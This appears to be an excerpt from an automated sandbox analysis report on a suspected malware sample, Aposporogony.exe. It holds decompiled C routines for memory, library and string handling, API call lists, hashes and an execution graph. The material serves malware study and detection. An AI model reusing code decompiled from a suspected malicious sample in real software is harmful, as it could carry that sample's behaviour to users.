                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00403A43() {
                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t8 =  *0x4216ec;
                                                                                                                                                                                      				_t3 = E00403A28(_t2, 0);
                                                                                                                                                                                      				if(_t8 != 0) {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t6 = _t8;
                                                                                                                                                                                      						_t8 =  *_t8;
                                                                                                                                                                                      						FreeLibrary( *(_t6 + 8));
                                                                                                                                                                                      						_t3 = GlobalFree(_t6);
                                                                                                                                                                                      					} while (_t8 != 0);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x4216ec =  *0x4216ec & 0x00000000;
                                                                                                                                                                                      				return _t3;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x00403a44
                                                                                                                                                                                      0x00403a4c
                                                                                                                                                                                      0x00403a53
                                                                                                                                                                                      0x00403a56
                                                                                                                                                                                      0x00403a56
                                                                                                                                                                                      0x00403a58
                                                                                                                                                                                      0x00403a5d
                                                                                                                                                                                      0x00403a64
                                                                                                                                                                                      0x00403a6a
                                                                                                                                                                                      0x00403a6e
                                                                                                                                                                                      0x00403a6f
                                                                                                                                                                                      0x00403a77

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77272EE0,00403A1A,77273420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                                                      • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                      			E00405D09(WCHAR* _a4) {
                                                                                                                                                                                      				WCHAR* _t5;
                                                                                                                                                                                      				WCHAR* _t7;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t7 = _a4;
                                                                                                                                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                                                                                                      				while( *_t5 != 0x5c) {
                                                                                                                                                                                      					_push(_t5);
                                                                                                                                                                                      					_push(_t7);
                                                                                                                                                                                      					_t5 = CharPrevW();
                                                                                                                                                                                      					if(_t5 > _t7) {
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					break;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *_t5 =  *_t5 & 0x00000000;
                                                                                                                                                                                      				return  &(_t5[1]);
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405d0a
                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                      0x00405d17
                                                                                                                                                                                      0x00405d1d
                                                                                                                                                                                      0x00405d1e
                                                                                                                                                                                      0x00405d1f
                                                                                                                                                                                      0x00405d27
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405d27
                                                                                                                                                                                      0x00405d29
                                                                                                                                                                                      0x00405d31

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aposporogony.exe,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00405D0F
                                                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aposporogony.exe,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00405D1F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                      • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E73D210E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                      				void* _v0;
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                      				signed int _t41;
                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				signed short* _t54;
                                                                                                                                                                                      				void* _t56;
                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                      				void* _t61;
                                                                                                                                                                                      
                                                                                                                                                                                      				 *0x73d2406c = _a8;
                                                                                                                                                                                      				 *0x73d24070 = _a16;
                                                                                                                                                                                      				 *0x73d24074 = _a12;
                                                                                                                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x73d24048, E73D215B1, _t51, _t56);
                                                                                                                                                                                      				_t41 =  *0x73d2406c +  *0x73d2406c * 4 << 3;
                                                                                                                                                                                      				_t17 = E73D21243();
                                                                                                                                                                                      				_v0 = _t17;
                                                                                                                                                                                      				_t52 = _t17;
                                                                                                                                                                                      				if( *_t17 == 0) {
                                                                                                                                                                                      					L16:
                                                                                                                                                                                      					return GlobalFree(_t17);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t19 =  *_t52 & 0x0000ffff;
                                                                                                                                                                                      						_t42 = 2;
                                                                                                                                                                                      						_t54 = _t52 + _t42;
                                                                                                                                                                                      						_t61 = _t19 - 0x6c;
                                                                                                                                                                                      						if(_t61 > 0) {
                                                                                                                                                                                      							_t20 = _t19 - 0x70;
                                                                                                                                                                                      							if(_t20 == 0) {
                                                                                                                                                                                      								L12:
                                                                                                                                                                                      								_t52 = _t54 + _t42;
                                                                                                                                                                                      								_t24 = E73D21272(E73D212BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                                                                                                                                      								L13:
                                                                                                                                                                                      								GlobalFree(_t24);
                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t26 = _t20 - _t42;
                                                                                                                                                                                      							if(_t26 == 0) {
                                                                                                                                                                                      								L10:
                                                                                                                                                                                      								_t52 =  &(_t54[1]);
                                                                                                                                                                                      								_t24 = E73D212E1(( *_t54 & 0x0000ffff) - 0x30, E73D21243());
                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L7:
                                                                                                                                                                                      							if(_t26 == 1) {
                                                                                                                                                                                      								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                                                                                                                                      								 *_t30 =  *0x73d24040;
                                                                                                                                                                                      								 *0x73d24040 = _t30;
                                                                                                                                                                                      								E73D21563(_t30 + 4,  *0x73d24074, _t41);
                                                                                                                                                                                      								_t59 = _t59 + 0xc;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t61 == 0) {
                                                                                                                                                                                      							L17:
                                                                                                                                                                                      							_t33 =  *0x73d24040;
                                                                                                                                                                                      							if( *0x73d24040 != 0) {
                                                                                                                                                                                      								E73D21563( *0x73d24074, _t33 + 4, _t41);
                                                                                                                                                                                      								_t59 = _t59 + 0xc;
                                                                                                                                                                                      								_t36 =  *0x73d24040;
                                                                                                                                                                                      								GlobalFree(_t36);
                                                                                                                                                                                      								 *0x73d24040 =  *_t36;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t38 = _t19 - 0x4c;
                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                      							goto L17;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t39 = _t38 - 4;
                                                                                                                                                                                      						if(_t39 == 0) {
                                                                                                                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t26 = _t39 - _t42;
                                                                                                                                                                                      						if(_t26 == 0) {
                                                                                                                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                                                                                                                      							goto L10;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                      						L14:
                                                                                                                                                                                      					} while ( *_t52 != 0);
                                                                                                                                                                                      					_t17 = _v0;
                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}





















                                                                                                                                                                                      0x73d210e6
                                                                                                                                                                                      0x73d210f0
                                                                                                                                                                                      0x73d210ff
                                                                                                                                                                                      0x73d2110e
                                                                                                                                                                                      0x73d21119
                                                                                                                                                                                      0x73d2111c
                                                                                                                                                                                      0x73d2112b
                                                                                                                                                                                      0x73d2112f
                                                                                                                                                                                      0x73d21131
                                                                                                                                                                                      0x73d211d8
                                                                                                                                                                                      0x73d211de
                                                                                                                                                                                      0x73d21137
                                                                                                                                                                                      0x73d21138
                                                                                                                                                                                      0x73d21138
                                                                                                                                                                                      0x73d2113d
                                                                                                                                                                                      0x73d2113e
                                                                                                                                                                                      0x73d21140
                                                                                                                                                                                      0x73d21143
                                                                                                                                                                                      0x73d2120d
                                                                                                                                                                                      0x73d21210
                                                                                                                                                                                      0x73d211b0
                                                                                                                                                                                      0x73d211b6
                                                                                                                                                                                      0x73d211bf
                                                                                                                                                                                      0x73d211c4
                                                                                                                                                                                      0x73d211c7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211c7
                                                                                                                                                                                      0x73d21212
                                                                                                                                                                                      0x73d21214
                                                                                                                                                                                      0x73d21196
                                                                                                                                                                                      0x73d2119d
                                                                                                                                                                                      0x73d211a5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211a5
                                                                                                                                                                                      0x73d21161
                                                                                                                                                                                      0x73d21162
                                                                                                                                                                                      0x73d2116a
                                                                                                                                                                                      0x73d21177
                                                                                                                                                                                      0x73d2117f
                                                                                                                                                                                      0x73d21188
                                                                                                                                                                                      0x73d2118d
                                                                                                                                                                                      0x73d2118d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21162
                                                                                                                                                                                      0x73d21149
                                                                                                                                                                                      0x73d211df
                                                                                                                                                                                      0x73d211df
                                                                                                                                                                                      0x73d211e6
                                                                                                                                                                                      0x73d211f3
                                                                                                                                                                                      0x73d211f8
                                                                                                                                                                                      0x73d211fb
                                                                                                                                                                                      0x73d21203
                                                                                                                                                                                      0x73d21205
                                                                                                                                                                                      0x73d21205
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211e6
                                                                                                                                                                                      0x73d2114f
                                                                                                                                                                                      0x73d21152
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21158
                                                                                                                                                                                      0x73d2115b
                                                                                                                                                                                      0x73d211ac
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211ac
                                                                                                                                                                                      0x73d2115d
                                                                                                                                                                                      0x73d2115f
                                                                                                                                                                                      0x73d21192
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21192
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211c9
                                                                                                                                                                                      0x73d211c9
                                                                                                                                                                                      0x73d211d3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d211d7

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 73D2116A
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D211C7
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D211D9
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73D21203
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                      • Opcode ID: a242316e35d9116d5d049191e67cee14a9cda6cad4290336a35d6111902b98f1
                                                                                                                                                                                      • Instruction ID: 1c1148d89268562e926aa7b5a216184046782ef11d114be6676afa7c7bca3b7d
                                                                                                                                                                                      • Opcode Fuzzy Hash: a242316e35d9116d5d049191e67cee14a9cda6cad4290336a35d6111902b98f1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 033104B38002119FE3019F75DE49B267FF8EB1462AB148129FC4AF3245E739D9548B35
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405E43(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                      				CHAR* _t17;
                                                                                                                                                                                      				CHAR* _t27;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t12 = lstrlenA(_a8);
                                                                                                                                                                                      				_t27 = _a4;
                                                                                                                                                                                      				_v8 = _t12;
                                                                                                                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                                      					_t14 = _v8;
                                                                                                                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                      						_t17 = _t27;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t27 = CharNextA(_t27);
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					return _t17;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t17 = 0;
                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                      			}









                                                                                                                                                                                      0x00405e53
                                                                                                                                                                                      0x00405e55
                                                                                                                                                                                      0x00405e58
                                                                                                                                                                                      0x00405e84
                                                                                                                                                                                      0x00405e5d
                                                                                                                                                                                      0x00405e66
                                                                                                                                                                                      0x00405e6b
                                                                                                                                                                                      0x00405e76
                                                                                                                                                                                      0x00405e79
                                                                                                                                                                                      0x00405e95
                                                                                                                                                                                      0x00405e7b
                                                                                                                                                                                      0x00405e82
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405e82
                                                                                                                                                                                      0x00405e8e
                                                                                                                                                                                      0x00405e92
                                                                                                                                                                                      0x00405e92
                                                                                                                                                                                      0x00405e8c
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:7
                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                      execution_graph 65890 1d882b20 65892 1d882b2a 65890->65892 65893 1d882b3f LdrInitializeThunk 65892->65893 65894 1d882b31 65892->65894 65895 1683dd0 TerminateThread 65896 1683de6 65895->65896 65900 1d8829f0 LdrInitializeThunk

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 26 1d882da0-1d882dac LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 9f7b7d4492dc47cf0685e1df87c24b34b5b34479499e4f027b0accbb139e3d63
                                                                                                                                                                                      • Instruction ID: c43eb0cad0167792834e767016305b1869c7eebb8679e033775b3fd30d455891
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7b7d4492dc47cf0685e1df87c24b34b5b34479499e4f027b0accbb139e3d63
                                                                                                                                                                                      • Instruction Fuzzy Hash: B690022166100642D5057159450461A001A47D1241FD1C466A1419515ECA398996B133
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
